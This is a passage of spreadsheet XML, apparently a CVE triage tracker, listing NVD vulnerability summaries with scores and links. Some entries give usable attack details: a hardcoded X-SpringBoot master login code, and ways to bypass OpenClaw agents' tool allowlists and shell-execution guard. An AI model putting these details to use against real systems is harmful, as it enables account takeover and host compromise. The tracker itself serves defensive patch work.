          <t>X-SpringBoot through 6.0 returns login verification codes in HTTP responses from unauthenticated endpoints GET /sys/mobile/code and GET /sys/email/code without sending them to account owners. Attackers can request codes using known mobile numbers or email addresses, read them from responses, and authenticate as victims via POST /sys/emailOrMobileLogin/login to hijack accounts.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97063</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97064</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 ships with a hardcoded static master login verification code 172839 enabled by default in the database seed. Unauthenticated attackers can authenticate as any user by submitting the public master code to the emailOrMobileLogin endpoint with a known email or mobile number.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97064</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51457</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>D-Link DAP-2610 up to 2.06B08r099 contains an authenticated command injection vulnerability within the web interface at the /index.xgi endpoint. An attacker with authenticated access can exploit some parameters to execute arbitrary system commands.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51457</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100520</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Laranode versions before 1.2.1 contain a path traversal vulnerability in the POST /filemanager/upload-file endpoint that allows authenticated users to write arbitrary files outside their home directory. Attackers can supply directory traversal sequences in the path parameter to write PHP files into other tenants' web roots and execute code as those tenants.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100520</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100544</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>openclaw's @openclaw/voice-call package before 2026.8.1 launches the configured agent for classic inbound voice calls without propagating the caller's identity or non-owner status. As a result, owner-only tool filtering can fail open and expose the agent's normal tool authority to a remote caller. A caller who is admitted by the configured inbound-call policy (open, pairing, or allowlist) on a deployment with inbound calling enabled can therefore drive tools intended for the trusted owner, potentially reading data, modifying files, executing commands, or controlling connected services depending on the agent's configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100544</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100552</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not correctly enforce per-chat tool policies for Codex app-server runtime tools. A conversation-level tools.allow rule filtered OpenClaw tools but did not restrict the shell, process, file, and patch tools owned by the Codex runtime. When a lower-trust conversation was assigned to a Codex runtime and restricted with a per-chat tool allowlist, a participant able to trigger that agent could still reach native command and file tools, bypassing the configured allowlist. The practical impact depends on the runtime's host permissions and sandbox configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100552</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100575</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Slack versions before 2026.8.1 fail to properly enforce sender allowlists in multi-person direct messages. Disallowed participants can trigger Slack agents and access tools and data granted to those agents by bypassing configured sender policies.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100575</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100580</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 improperly handles case sensitivity in the model-facing cron tool: a mixed-case payload kind can pass the agent-facing shell-execution guard and later normalize into a command job. An actor able to steer a tool-enabled agent can therefore create a persistent cron job that executes attacker-selected commands with the privileges of the OpenClaw process user, resulting in access to host files and credentials and impact to scheduled service availability. The issue is limited to cron jobs created or edited through the model-facing cron tool; direct CLI and authorized Gateway scheduling surfaces are trusted operator controls. Fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100580</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100586</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Codex before 2026.7.1 fails to properly enforce owner authorization when creating native conversation bindings. Non-owner channel senders with command access can create bindings to the native Codex runtime and execute host-capable turns with access to files, tools, and processes.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100586</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100587</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly validate owner authorization in the Codex computer-use installation command. Non-owner channel senders can install arbitrary plugins and execute MCP processes with OpenClaw user privileges, affecting host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100587</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100596</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly authorize non-owner users executing MCP configuration changes through /mcp set and /mcp unset commands. Attackers can persist arbitrary stdio MCP commands that execute with OpenClaw process privileges when configuration loads, compromising host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100596</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100599</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions 2026.5.1 through 2026.7.0 fail to apply the configured exec approval path to Google Meet node commands. The googlemeet.chrome command accepts caller-supplied audio command arrays and executes them on a paired node without going through the normal system.run approval flow. In deployments with the Google Meet plugin enabled, a paired Chrome node, and the googlemeet.chrome node command allowed, a tool-enabled agent able to invoke that command can execute attacker-selected processes on the paired node, impacting files, credentials, browser profiles, and availability on that node. The issue is fixed in 2026.7.1; as a workaround, remove googlemeet.chrome from allowed node commands or disable the Google Meet plugin.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100599</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19804</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls &amp; Member Access Subscriptions plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 260814 via the 'first_name' parameter parameter. This is due to insufficient sanitization of the first_name parameter via esc_refs(), which strips only regex backreferences and not PHP tags, before substitution into the eval'd Signup Tracking Codes template, combined with disclosure of the site-global proxy verification key that allows PayPal postback verification to be bypassed. This makes it possible for unauthenticated attackers to execute code on the server. Successful exploitation requires that the site administrator has configured a Signup Tracking Codes template containing the %%first_name%% placeholder (a documented, GUI-supported feature) and that the attacker has obtained the site-global proxy verification key, which is exposed in plaintext in the JSON response of any PayPal Checkout AJAX request on the target site.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19804</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61525</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.2 and 7.1.0, zammad's session management for websocket and long-polling connections is susceptible to a path traversal attack. Session identifiers supplied by the client are insufficiently validated before being used to construct internal file paths. When the file-based session store is active (the default configuration), an authenticated attacker can manipulate the session identifier to reference locations outside the intended storage directory, leading to the deletion of arbitrary files and directories on the server. Exploitation requires only a low-privilege authenticated session and a single crafted request. Instances configured to use the Redis-based session store are not affected. This issue is fixed in versions 7.0.3 and 7.1.1.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61525</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62062</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Elementor Website Builder allows Cross Site Request Forgery.
This issue affects Elementor Website Builder: from n/a through 4.3.1.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62062</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85542</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is affected by a command injection vulnerability in the GIM bundle import functionality. An authenticated attacker can provide a crafted GIM bundle that causes attacker-controlled arguments to be passed to the tar command, resulting in arbitrary command execution with elevated privileges on the Central Manager.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85542</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89426</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
